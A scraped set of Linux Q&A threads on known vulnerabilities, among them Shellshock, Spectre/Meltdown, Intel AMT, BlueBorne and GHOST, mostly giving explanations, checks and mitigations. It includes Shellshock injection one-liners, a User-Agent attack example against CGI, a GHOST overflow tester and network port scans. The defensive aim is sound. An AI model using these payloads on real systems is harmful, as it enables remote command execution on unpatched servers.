This is considered insecure because variables are not typically allowed or expected, by themselves, to directly cause the invocation of arbitrary code contained in them. Perhaps your program sets environment variables from untrusted user input. It would be highly unexpected that those environment variables could be manipulated in such a way that the user could run arbitrary commands without your explicit intent to do so using that environment variable for such a reason declared in the code.
Here is an example of a viable attack. You run a web server that runs a vulnerable shell, somewhere, as part of its lifetime. This web server passes environment variables to a bash script, for example, if you are using CGI, information about the HTTP request is often included as environment variables from the web server. For example, HTTP_USER_AGENT might be set to the contents of your user agent. This means that if you spoof your user agent to be something like '() { :; }; echo foo', when that shell script runs, echo foo will be executed. Again, echo foo could be anything, malicious or not.
|
There is apparently a vulnerability (CVE-2014-6271) in bash: Bash specially crafted environment variables code injection attack
I am trying to figure out what is happening, but I'm not entirely sure I understand it. How can the echo be executed as it is in single quotes?
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a testEDIT 1: A patched system looks like this:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a testEDIT 2: There is a related vulnerability / patch: CVE-2014-7169 which uses a slightly different test:
$ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"unpatched output:
vulnerable
bash: BASH_FUNC_x(): line 0: syntax error near unexpected token `)'
bash: BASH_FUNC_x(): line 0: `BASH_FUNC_x() () { :;}; echo vulnerable'
bash: error importing function definition for `BASH_FUNC_x'
testpartially (early version) patched output:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
bash: error importing function definition for `BASH_FUNC_x()'
testpatched output up to and including CVE-2014-7169:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `BASH_FUNC_x'
testEDIT 3: story continues with:CVE-2014-7186
CVE-2014-7187
CVE-2014-6277
|
What does env x='() { :;}; command' bash do and why is it insecure?
|
A number of kernel boot parameters are available to disable or fine-tune hardware vulnerability mitigations:for Spectre v1 and v2: nospectre_v1 (x86, PowerPC), nospectre_v2 (x86, PowerPC, S/390, ARM64), spectre_v2_user=off (x86)
for SSB: spec_store_bypass_disable=off (x86, PowerPC), ssbd=force-off (ARM64)
for L1TF: l1tf=off (x86)
for MDS: mds=off (x86)
for TAA: tsx_async_abort=off
for iTLB multihit: kvm.nx_huge_pages=off
for SRBDS: srbds=off
for retbleed: retbleed=off
KPTI can be disabled with nopti (x86, PowerPC) or kpti=0 (ARM64)A meta-parameter, mitigations, was introduced in 5.2 and back-ported to 5.1.2, 5.0.16, and 4.19.43 (and perhaps others). It can be used to control all mitigations, on all architectures, as follows:mitigations=off will disable all optional CPU mitigations;
mitigations=auto (the default setting) will mitigate all known CPU vulnerabilities, but leave SMT enabled (if it is already);
mitigations=auto,nosmt will mitigate all known CPU vulnerabilities and disable SMT if appropriate.Some of these can be toggled at runtime; see the linked documentation for details.
|
Can I disable Spectre and Meltdown mitigation features in Ubuntu 18.04LTS?
I want to test how much more performance I gain when I disable these two features in Linux, and if the performance is big, to make it permanently.
|
Disable Spectre and Meltdown mitigations
|
Alan Cox shared a link from AMD's blog:
https://www.amd.com/en/corporate/speculative-execution
Variant One: Bounds Check BypassResolved by software / OS updates to be made available by system
vendors and manufacturers. Negligible performance impact expected.Variant Two: Branch Target InjectionDifferences in AMD architecture mean there is a near zero risk of
exploitation of this variant. Vulnerability to Variant 2 has not been
demonstrated on AMD processors to date.Variant Three: Rogue Data Cache LoadZero AMD vulnerability due to AMD architecture differences.It would be good to have confirmation of these AMD's statements by a third party though.
The 'mitigation' on affected systems, would require a new kernel and a reboot, but on many distributions there is not yet released packages with the fixes:https://www.cyberciti.biz/faq/patch-meltdown-cpu-vulnerability-cve-2017-5754-linux/Debian:https://security-tracker.debian.org/tracker/CVE-2017-5715
https://security-tracker.debian.org/tracker/CVE-2017-5753
https://security-tracker.debian.org/tracker/CVE-2017-5754Other sources of information I found:https://lists.bufferbloat.net/pipermail/cerowrt-devel/2018-January/011108.html
https://www.reddit.com/r/Amd/comments/7o2i91/technical_analysis_of_spectre_meltdown/
|
Security researchers have published on the Project Zero a new vulnerability called Spectre and Meltdown allowing a program to steal information from a memory of others programs. It affects Intel, AMD and ARM architectures.
This flaw can be exploited remotely by visiting a JavaScript website. Technical details can be found on redhat website, Ubuntu security team.Information Leak via speculative execution side channel attacks (CVE-2017-5715, CVE-2017-5753, CVE-2017-5754 a.k.a. Spectre and Meltdown)
It was discovered that a new class of side channel attacks impact most processors, including processors from Intel, AMD, and ARM. The attack allows malicious userspace processes to read kernel memory and malicious code in guests to read hypervisor memory. To address the issue, updates to the Ubuntu kernel and processor microcode will be needed. These updates will be announced in future Ubuntu Security Notices once they are available.Example Implementation in JavaScriptAs a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs.My system seem to be affected by the spectre vulnerability. I have compiled and executed this proof-of-concept (spectre.c).
System information:
$ uname -a
4.13.0-0.bpo.1-amd64 #1 SMP Debian 4.13.13-1~bpo9+1 (2017-11-22) x86_64 GNU/Linux$ cat /proc/cpuinfo
model name : Intel(R) Core(TM) i3-3217U CPU @ 1.80GHz$gcc --version
gcc (Debian 6.3.0-18) 6.3.0 20170516How to mitigate the Spectre and Meldown vulnerabilities on Linux systems?
Further reading: Using Meltdown to steal passwords in real time.
Update
Using the Spectre & Meltdown Checker after switching to the 4.9.0-5 kernel version following @Carlos Pasqualini answer because a security update is available to mitigate the cve-2017-5754 on debian Stretch:
CVE-2017-5753 [bounds check bypass] aka 'Spectre Variant 1'
* Checking count of LFENCE opcodes in kernel: NO (only 31 opcodes found, should be >= 70)
> STATUS: VULNERABLE (heuristic to be improved when official patches become available)CVE-2017-5715 [branch target injection] aka 'Spectre Variant 2'
* Mitigation 1
* Hardware (CPU microcode) support for mitigation: NO
* Kernel support for IBRS: NO
* IBRS enabled for Kernel space: NO
* IBRS enabled for User space: NO
* Mitigation 2
* Kernel compiled with retpoline option: NO
* Kernel compiled with a retpoline-aware compiler: NO
> STATUS: VULNERABLE (IBRS hardware + kernel support OR kernel with retpoline are needed to mitigate the vulnerability)CVE-2017-5754 [rogue data cache load] aka 'Meltdown' aka 'Variant 3'
* Kernel supports Page Table Isolation (PTI): YES
* PTI enabled and active: YES
> STATUS: NOT VULNERABLE (PTI mitigates the vulnerability)Update Jan 25 , 2018
The spectre-meltdown-checker script is officially packaged by debian , it is available for Debian Stretch through backports repository , Buster and Sid.
Update 05/22/2018
Speculative Store Bypass (SSB) – also known as Variant 4Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.Rogue System Register Read (RSRE) – also known as Variant 3aSystems with microprocessors utilizing speculative execution and that perform speculative reads of system registers may allow unauthorized disclosure of system parameters to an attacker with local user access via a side-channel analysis.Edit July 27 , 2018
NetSpectre: Read Arbitrary Memory over NetworkIn this paper, we present NetSpectre, a new attack based on
Spectre variant 1, requiring no attacker-controlled code on the
target device, thus affecting billions of devices. Similar to a local
Spectre attack, our remote attack requires the presence of a Spectre
gadget in the code of the target. We show that systems containing
the required Spectre gadgets in an exposed network interface or API
can be attacked with our generic remote Spectre attack, allowing to
read arbitrary memory over the network. The attacker only sends
a series of crafted requests to the victim and measures the response
time to leak a secret value from the victim’s memory.
|
How to mitigate the Spectre and Meltdown vulnerabilities on Linux systems?
|
The clearest post I’ve seen on this issue is Matthew Garrett’s (including the comments).
Matthew has now released a tool to check your system locally: build it, run it with
sudo ./mei-amt-checkand it will report whether AMT is enabled and provisioned, and if it is, the firmware versions (see below). The README has more details.
To scan your network for potentially vulnerable systems, scan ports 623, 624, and 16992 to 16993 (as described in Intel’s own mitigation document); for example
nmap -p16992,16993,16994,16995,623,664 192.168.1.0/24will scan the 192.168.1/24 network, and report the status of all hosts which respond. Being able to connect to port 623 might be a false positive (other IPMI systems use that port), but any open port from 16992 to 16995 is a very good indicator of enabled AMT (at least if they respond appropriately: with AMT, that means an HTTP response on 16992 and 16993, the latter with TLS).
If you see responses on ports 16992 or 16993, connecting to those and requesting / using HTTP will return a response with a Server line containing “Intel(R) Active Management Technology” on systems with AMT enabled; that same line will also contain the version of the AMT firmware in use, which can then be compared with the list given in Intel’s advisory to determine whether it’s vulnerable.
See CerberusSec’s answer for a link to a script automating the above.
There are two ways to fix the issue “properly”:upgrade the firmware, once your system’s manufacturer provides an update (if ever);
avoid using the network port providing AMT, either by using a non-AMT-capable network interface on your system, or by using a USB adapter (many AMT workstations, such as C226 Xeon E3 systems with i210 network ports, have only one AMT-capable network interface — the rest are safe; note that AMT can work over wi-fi, at least on Windows, so using built-in wi-fi can also lead to compromission).If neither of these options is available, you’re in mitigation territory. If your AMT-capable system has never been provisioned for AMT, then you’re reasonably safe; enabling AMT in that case can apparently only be done locally, and as far as I can tell requires using your system’s firmware or Windows software. If AMT is enabled, you can reboot and use the firmware to disable it (press CtrlP when the AMT message is displayed during boot).
Basically, while the privilege vulnerability is quite nasty, it seems most Intel systems aren’t actually affected. For your own systems running Linux or another Unix-like operating system, escalation probably requires physical access to the system to enable AMT in the first place. (Windows is another story.) On systems with multiple network interfaces, as pointed out by Rui F Ribeiro, you should treat AMT-capable interfaces in the same way as you’d treat any administrative interface (IPMI-capable, or the host interface for a VM hypervisor) and isolate it on an administrative network (physical or VLAN). You cannot rely on a host to protect itself: iptables etc. are ineffective here, because AMT sees packets before the operating system does (and keeps AMT packets to itself).
VMs can complicate matters, but only in the sense that they can confuse AMT and thus produce confusing scanning results if AMT is enabled. amt-howto(7) gives the example of Xen systems where AMT uses the address given to a DomU over DHCP, if any, which means a scan would show AMT active on the DomU, not the Dom0...
|
According to the Intel security-center post dated May 1, 2017, there is a critical vulnerability on Intel processors which could allow an attacker to gain privilege (escalation of privilege) using AMT, ISM and SBT.
Because the AMT has direct access to the computer’s network hardware, this hardware vulnerability will allow an attacker to access any system.There is an escalation of privilege vulnerability in Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM), and Intel® Small Business Technology versions firmware versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 that can allow an unprivileged attacker to gain control of the manageability features provided by these products. This vulnerability does not exist on Intel-based consumer PCs.Intel have released a detection tool available for Windows 7 and 10. I am using information from dmidecode -t 4 and by searching on the Intel website I found that my processor uses Intel® Active Management Technology (Intel® AMT) 8.0.Affected products:
The issue has been observed in Intel manageability firmware versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for Intel® Active Management Technology, Intel® Small Business Technology, and Intel® Standard Manageability. Versions before 6 or after 11.6 are not impacted.The description:An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM), and Intel® Small Business Technology (SBT)How can I easily detect and mitigate the Intel escalation of privilege vulnerability on a Linux system?
|
How to detect and mitigate the Intel escalation of privilege vulnerability on a Linux system (CVE-2017-5689)?
|
Having manually bisected, this is a bug in rsync and is fixed by commit 5c93dedf4538 ("Add backtick to SHELL_CHARS."), which will be in the upcoming rsync 3.2.8 (not yet released). It was broken by commit 6b8db0f6440b ("Add an arg-protection idiom using backslash-escapes"), which is in 3.2.4.
As a mitigation, an option to use the old arg parsing behaviour (--old-args) exists:
rsync --old-args 'server:./\`a\`b' .
|
Yeah, I know what you are thinking: "Who on earth names their file `a`b?"
But let us assume you do have a file called `a`b (possibly made by a crazy Mac user - obviously not by you), and you want to rsync that. The obvious solution:
rsync server:'./`a`b' ./.;
rsync 'server:./`a`b' ./.;gives:
bash: line 1: a: command not found
rsync: [sender] link_stat "/home/tange/b" failed: No such file or directory (2)
rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1865) [Receiver=3.2.7]
rsync: [Receiver] write error: Broken pipe (32)Even:
$ rsync 'server:./\`a\`b' ./.;
bash: line 3: a\: command not found
rsync: [sender] link_stat "/home/tange/\b" failed: No such file or directory (2)
:What is the rsync command I should be running?
$ rsync --version
rsync version 3.2.7 protocol version 31
|
rsync the file `a`b
|
The coordinated disclosure date for the BlueBorne vulnerabilities was September 12, 2017; you should see distribution updates with fixes for the issues shortly thereafter. For example:RHEL
Debian CVE-2017-1000250 and CVE-2017-1000251Until you can update the kernel and BlueZ on affected systems, you can mitigate the issue by disabling Bluetooth (which might have adverse effects of course, especially if you use a Bluetooth keyboard or mouse):blacklist the core Bluetooth modules
printf "install %s /bin/true\n" bnep bluetooth btusb >> /etc/modprobe.d/disable-bluetooth.confdisable and stop the Bluetooth service
systemctl disable bluetooth.service
systemctl mask bluetooth.service
systemctl stop bluetooth.serviceremove the Bluetooth modules
rmmod bnep
rmmod bluetooth
rmmod btusb(this will probably fail at first with an error indicating other modules are using these; you’ll need to remove those modules and repeat the above commands).If you want to patch and rebuild BlueZ and the kernel yourself, the appropriate fixes are available here for BlueZ and here for the kernel.
|
The Armis Lab has discovered a new vector attack affecting all devices with Bluetooth enabled including Linux and IoT systems.BlueBorne attack on Linux
Armis has disclosed two vulnerabilities in the Linux operating system which allow attackers to take complete control over infected devices. The first is an information leak vulnerability, which can help the attacker determine the exact version used by the targeted device and adjust his exploit accordingly. The second is a stack overflow with can lead to full control of a device.For instance all devices with Bluetooth enabled should be marked as malicious. The infected devices will create a malicious network allowing the attacker to take control of all device out of its Bluetooth range. Using the Bluetooth on Linux system to connect a peripheral devices
(keyboards, mice, headphones, etc.) put the Linux under a various risks.This attack does not require any user interaction, authentication or pairing, making it also practically invisible.
All Linux devices running BlueZ are affected by the information leak vulnerability (CVE-2017-1000250).All my Linux OS with Bluetooth enabled are marked as vulnerable after a check with the BlueBorne Vulnerability Scanner (Android application by Armis to discover the vulnerable device require to enable the device discovery, but the attack just require only the Bluetooth to be enabled).
Is there a way to mitigate the BlueBorne attack when using Bluetooth on a Linux system?
|
How do I secure Linux systems against the BlueBorne remote attack?
|
To reassure a few, I didn't find the bug by observing exploits, I have
no reason to believe it's been exploited before being disclosed
(though of course I can't rule it out). I did not find it by
looking at bash's code either.
I can't say I remember exactly my train of thoughts at the time.
That more or less came from some reflection on some behaviours of
some software I find dangerous (the behaviours, not the
software). The kind of behaviour that makes you think: that
doesn't sound like a good idea.
In this case, I was reflecting on the common configuration of
ssh that allows passing environment variables unsanitised from
the client provided their name starts with LC_. The idea is so
that people can keep using their own language when sshing into
other machines. A good idea until you start to consider
how complex localisation handling is especially when UTF-8 is
brought into the equation (and seeing how badly it's handled by
many applications).
Back in July 2014, I had already reported a vulnerability in
glibc localisation handling which combined with that sshd
config, and two other dangerous behaviours of the bash shell
allowed (authenticated) attackers to hack into git servers
provided they were able to upload files there and bash was
used as the login shell of the git unix user (CVE-2014-0475).
I was thinking it was probably a bad idea to use bash as the login
shell of users offering services over ssh, given that it's quite
a complex shell (when all you need is just parsing a very simple command line) and has inherited most of the misdesigns of ksh.
Since I had already identified a few problems with bash being
used in that context (to interpret ssh ForceCommands), I was
wondering if there were potentially more there.
AcceptEnv LC_* allows any variable whose name starts
with LC_ and I had the vague recollection that bash exported
functions (a dangerous albeit at time useful feature) were
using environment variables whose name was something like
myfunction() and was wondering if there was not something
interesting to look at there.
I was about to dismiss it on the ground that the worst thing one
could do would be to redefine a command called LC_something
which could not really be a problem as those are not existing
command names, but then I started to wonder how bash
imported those environment variables.
What if the variables were called LC_foo;echo test; f() for instance? So I decided to have a closer look.
A:
$ env -i bash -c 'zzz() { :;}; export -f zzz; env'
[...]
zzz=() { :
}revealed that my recollection was wrong in that the variables
were not called myfunction() but myfunction (and it's the
value that starts with ()).
And a quick test:
$ env 'true;echo test; f=() { :;}' bash -c :
test
bash: error importing function definition for `true;echo test; f'confirmed my suspicion that the variable name was not sanitized,
and the code was evaluated upon startup.
Worse, a lot worse, the value was not sanitized either:
$ env 'foo=() { :;}; echo test' bash -c :
testThat meant that any environment variable could be a vector.
That's when I realised the extent of the problem, confirmed that it was
exploitable over HTTP as well (HTTP_xxx/QUERYSTRING... env vars), other ones like mail processing services, later DHCP (and probably a long list) and
reported it (carefully).
|
Since this bug affects so many platforms, we might learn something from the process by which this vulnerability was found: was it an εὕρηκα (eureka) moment or the result of a security check?
Since we know Stéphane found the Shellshock bug, and others may know the process as well, we would be interested in the story of how he came to find the bug.
|
How was the Shellshock Bash vulnerability found?
|
Answer to my question, from Qualys:During our testing, we developed a proof-of-concept in which we send a
specially created e-mail to a mail server and can get a remote shell
to the Linux machine. This bypasses all existing protections (like
ASLR, PIE and NX) on both 32-bit and 64-bit systems.My compiled research below for anyone else looking:Disclaimer
Despite what a lot of other threads/blogs might tell you, I suggest not to immediately update every single OS you have blindly without thoroughly testing these glibc updates. It has been reported that the glibc updates have caused massive application segfaults forcing people to roll back their glibc updates to their previous version.
One does not simply mass-update a production environment without testing.Background Information
GHOST is a 'buffer overflow' bug affecting the gethostbyname() and gethostbyname2() function calls in the glibc library. This vulnerability allows a remote attacker that is able to make an application call to either of these functions to execute arbitrary code with the permissions of the user running the application.
Impact
The gethostbyname() function calls are used for DNS resolving, which is a very common event. To exploit this vulnerability, an attacker must trigger a buffer overflow by supplying an invalid hostname argument to an application that performs a DNS resolution.
Current list of affected Linux distros
RHEL (Red Hat Enterprise Linux) version 5.x, 6.x and 7.x
RHEL 4 ELS fix available ---> glibc-2.3.4-2.57.el4.2
Desktop (v. 5) fix available ---> glibc-2.5-123.el5_11.1
Desktop (v. 6) fix available ---> glibc-2.12-1.149.el6_6.5
Desktop (v. 7) fix available ---> glibc-2.17-55.el7_0.5
HPC Node (v. 6) fix available ---> glibc-2.12-1.149.el6_6.5
HPC Node (v. 7) fix available ---> glibc-2.17-55.el7_0.5
Server (v. 5) fix available ---> glibc-2.5-123.el5_11.1
Server (v. 6) fix available ---> glibc-2.12-1.149.el6_6.5
Server (v. 7) fix available ---> glibc-2.17-55.el7_0.5
Server EUS (v. 6.6.z) fix available ---> glibc-2.12-1.149.el6_6.5
Workstation (v. 6) fix available ---> glibc-2.12-1.149.el6_6.5
Workstation (v. 7) fix available ---> glibc-2.17-55.el7_0.5CentOS Linux version 5.x, 6.x & 7.x
CentOS-5 fix available ---> glibc-2.5-123.el5_11
CentOS-6 fix available ---> glibc-2.12-1.149.el6_6.5
CentOS-7 fix available ---> glibc-2.17-55.el7_0.5Ubuntu Linux version 10.04, 12.04 LTS
10.04 LTS fix available ---> libc6-2.11.1-0ubuntu7.20
12.04 LTS fix available ---> libc6-2.15-0ubuntu10.10Debian Linux version 6.x, 7.x
6.x squeeze vulnerable
6.x squeeze (LTS) fix available ---> eglibc-2.11.3-4+deb6u4
7.x wheezy vulnerable
7.x wheezy (security) fix available ---> glib-2.13-38+deb7u7Linux Mint version 13.0
Mint 13 fix available ---> libc6-2.15-0ubuntu10.10Fedora Linux version 19 (or older should upgrade)
Fedora 19 - vulnerable - EOL on Jan 6, 2014 (upgrade to Fedora 20/21 for patch)SUSE Linux Enterprise
Server 10 SP4 LTSS for x86 fix available ---> glibc-2.4-31.113.3
Server 10 SP4 LTSS for AMD64 and Intel EM64T fix available ---> glibc-2.4-31.113.3
Server 10 SP4 LTSS for IBM zSeries 64bit fix available ---> glibc-2.4-31.113.3
Software Development Kit 11 SP3 fix available ---> glibc-2.11.3-17.74.13
Server 11 SP1 LTSS fix available ---> glibc-2.11.1-0.60.1
Server 11 SP2 LTSS fix available ---> glibc-2.11.3-17.45.55.5
Server 11 SP3 (VMware) fix available ---> glibc-2.11.3-17.74.13
Server 11 SP3 fix available ---> glibc-2.11.3-17.74.13
Desktop 11 SP3 fix available ---> glibc-2.11.3-17.74.13openSUSE (versions older than 11 should upgrade)
11.4 Evergreen fix available ---> glibc-2.11.3-12.66.1
12.3 fix available ---> glibc-2.17-4.17.1What packages/applications are still using the deleted glibc?
(credits to Gilles)
For CentOS/RHEL/Fedora/Scientific Linux:
lsof -o / | awk '
BEGIN {
while (("rpm -ql glibc | grep \\\\.so\\$" | getline) > 0)
libs[$0] = 1
}
$4 == "DEL" && $8 in libs {print $1, $2}'For Ubuntu/Debian Linux:
lsof -o / | awk '
BEGIN {
while (("dpkg -L libc6:amd64 | grep \\\\.so\\$" | getline) > 0)
libs[$0] = 1
}
$4 == "DEL" && $8 in libs {print $1, $2}'What C library (glibc) version does my Linux system use?
The easiest way to check the version number is to run the following command:
ldd --versionSample outputs from RHEL/CentOS Linux v6.6:
ldd (GNU libc) 2.12
Copyright (C) 2010 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.Sample outputs from Ubuntu Linux 12.04.5 LTS:
ldd (Ubuntu EGLIBC 2.15-0ubuntu10.9) 2.15
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.Sample outputs from Debian Linux v7.8:
ldd (Debian EGLIBC 2.13-38+deb7u6) 2.13
Copyright (C) 2011 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.GHOST vulnerability check
The University of Chicago is hosting the below script for easy downloading:
$ wget https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
[OR]
$ curl -O https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
$ gcc GHOST.c -o GHOST
$ ./GHOST
[responds vulnerable OR not vulnerable ]/* ghosttest.c: GHOST vulnerability tester */
/* Credit: http://www.openwall.com/lists/oss-security/2015/01/27/9 */
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>#define CANARY "in_the_coal_mine"struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval; /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
char name[sizeof(temp.buffer)];
memset(name, '0', len);
name[len] = '\0'; retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno); if (strcmp(temp.canary, CANARY) != 0) {
puts("vulnerable");
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts("not vulnerable");
exit(EXIT_SUCCESS);
}
puts("should not happen");
exit(EXIT_FAILURE);
}Compile and run it as follows:
$ gcc ghosttester.c -o ghosttester
$ ./ghosttester
[responds vulnerable OR not vulnerable ]Red Hat Access Lab: GHOST tool Do not use this tool, its reporting is wrong, the Vulnerability checker from Qualys is accurate.PatchingCentOS/RHEL/Fedora/Scientific Linux
sudo yum clean all
sudo yum updateNow restart to take affect:
sudo rebootAlternatively, if your mirror don’t contain the newest packages, just download them manually. *note: For more advanced users
CentOS 5
http://mirror.centos.org/centos/5.11/updates/x86_64/RPMS/CentOS 6
mkdir ~/ghostupdate
cd ~/ghostupdatewget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-devel-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-common-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/nscd-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-static-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-headers-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-utils-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-2.12-1.149.el6_6.5.x86_64.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-static-2.12-1.149.el6_6.5.i686.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-devel-2.12-1.149.el6_6.5.i686.rpm
wget http://mirror.centos.org/centos/6.6/updates/x86_64/Packages/glibc-2.12-1.149.el6_6.5.i686.rpmyum localupdate *.rpm [OR] rpm -Uvh *.rpmUbuntu/Debian Linux
sudo apt-get clean
sudo apt-get update
sudo apt-get dist-upgradeRestart:
sudo rebootSUSE Linux Enterprise
To install this SUSE Security Update use YaST online_update. Or use the following commands as per your version:
SUSE Linux Enterprise Software Development Kit 11 SP3
zypper in -t patch sdksp3-glibc-10206SUSE Linux Enterprise Server 11 SP3 for VMware
zypper in -t patch slessp3-glibc-10206SUSE Linux Enterprise Server 11 SP3
zypper in -t patch slessp3-glibc-10206SUSE Linux Enterprise Server 11 SP2 LTSS
zypper in -t patch slessp2-glibc-10204SUSE Linux Enterprise Server 11 SP1 LTSS
zypper in -t patch slessp1-glibc-10202SUSE Linux Enterprise Desktop 11 SP3
zypper in -t patch sledsp3-glibc-10206Finally run for all SUSE linux version to bring your system up-to-date:
zypper patchOpenSUSE Linux
To see a list of available updates including glibc on a OpenSUSE Linux, enter:
zypper luTo simply update installed glibc packages with their newer available versions, run:
zypper upNearly every program running on your machine uses glibc. You need to restart every service or app that uses glibc to ensure the patch takes effect. Therefore, a reboot is recommended.How to restart init without restarting or affecting the system?
telinit u' man telinit ' -- U or u to request that the init(8) daemon re-execute itself. This is not recommended since Upstart is currently unable to pre-serve its state, but is necessary when upgrading system libraries.To immediately mitigate the threat in a limited manner is by disabling reverse DNS checks in all your public facing services. For example, you can disable reverse DNS checks in SSH by setting UseDNS to no in your /etc/ssh/sshd_config.
Sources (and more information):https://access.redhat.com/articles/1332213
http://www.cyberciti.biz/faq/cve-2015-0235-patch-ghost-on-debian-ubuntu-fedora-centos-rhel-linux/
http://www.openwall.com/lists/oss-security/2015/01/27/9
https://security.stackexchange.com/questions/80210/ghost-bug-is-there-a-simple-way-to-test-if-my-system-is-secure
http://bobcares.com/blog/ghost-hunting-resolving-glibc-remote-code-execution-vulnerability-cve-2015-0235-in-centos-red-hat-ubuntu-debian-and-suse-linux-servers
https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability
https://security-tracker.debian.org/tracker/CVE-2015-0235
|
Does the Ghost Vulnerability require access (as in being a logged in user) to the effected OS in question? Can someone clarify the 'remote attacker that is able to make an application call'? I only seem to find tests to run on the local system directly but not from a remote host.
All the information I have gathered so far about the Ghost Vulnerability from multiple sources (credits to those sources) I have posted below in an answer in case anyone else is curious.
Edit, I found my answer:During a code audit Qualys researchers discovered a buffer overflow in
the __nss_hostname_digits_dots() function of glibc. This bug can be
triggered both locally and remotely via all the gethostbyname*()
functions. Applications have access to the DNS resolver primarily
through the gethostbyname*() set of functions. These functions convert
a hostname into an IP address.
|
Ghost Vulnerability - CVE-2015-0235
|
Can I do anything further to protect my system, and if so, what should my next steps be?You can do something further to protect your system: you can disable SMT (hyperthreading). This is usually possible in your system’s firmware setup.Do I need to take action regarding my Microarchitectural Data Sampling (MDS) status?That depends on what you use your system for. As a general rule, if you only run trusted applications with trusted content, you don’t need to take further action. (The jury is still out regarding web browsers’ vulnerability to MDS with SMT.) If you run VMs or containers with unvetted contents, you might be at risk.
|
My dmesg output contains the following line:
[ 0.265021] MDS CPU bug present and SMT on, data leak possible. See https://www.kernel.org/doc/html/latest/admin-guide/hw-vuln/mds.html for more details.Having gone to the above-mentioned site and having read up on MDS a little, I ran/received the following:
$ cat /sys/devices/system/cpu/vulnerabilities/mds
Mitigation: Clear CPU buffers; SMT vulnerable
According to the site, this translates to:'Mitigation: Clear CPU buffers' ... The processor is vulnerable and the
CPU buffer clearing mitigation is enabled.
'SMT vulnerable' ... SMT is enabledI don't have a lot of experience in computing, but from what I can tell (and please correct me if I'm wrong), my system is doing what it can to protect against MDS.
My question is:
Can I do anything further to protect my system, and if so, what should my next steps be?
|
Do I need to take action regarding my Microarchitectural Data Sampling (MDS) status?
|
According to LWN there is a mitigation which can be used while you do not have a patched kernel:there is a mitigation available in the form of the
tcp_challenge_ack_limit sysctl knob. Setting that value
to something enormous (e.g. 999999999) will make it
much harder for attackers to exploit the flaw.You should set it by creating a file in /etc/sysctl.d and then implementing it with sysctl -a. Open a terminal (press Ctrl+Alt+T), and run:
sudo -iecho "# CVE-2016-5696
net.ipv4.tcp_challenge_ack_limit = 999999999
" > /etc/sysctl.d/security.confsysctl -a
exitBy the way, you can track the state of this vulnerability on Debian in the security tracker.
|
According to cve.mitre.org, the Linux kernel before 4.7 is vulnerable to “Off-path” TCP exploitsDescription
net/ipv4/tcp_input.c in the Linux kernel before 4.7 does not properly determine the rate of challenge ACK segments, which makes it easier for man-in-the-middle attackers to hijack TCP sessions via a blind in-window attack.This vulnerability is considered as dangerous because the attacker just needs an IP address to perform an attack.
Does upgrading the Linux kernel to the latest stable version, 4.7.1, become the only way to protect my system?
|
How do I protect my system against the Off-path TCP exploit in Linux?
|
This is not an issue for OpenSSH since it doesn't make use of SSL.
excerpt - What is the difference between SSL vs SSH? Which is more secure?They differ on the things which are around the tunnel. SSL
traditionally uses X.509 certificates for announcing server and client
public keys; SSH has its own format. Also, SSH comes with a set of
protocols for what goes inside the tunnel (multiplexing several
transfers, performing password-based authentication within the tunnel,
terminal management...) while there is no such thing in SSL, or, more
accurately, when such things are used in SSL they are not considered
to be part of SSL (for instance, when doing password-based HTTP
authentication in a SSL tunnel, we say that it is part of "HTTPS", but
it really works in a way similar to what happens with SSH).
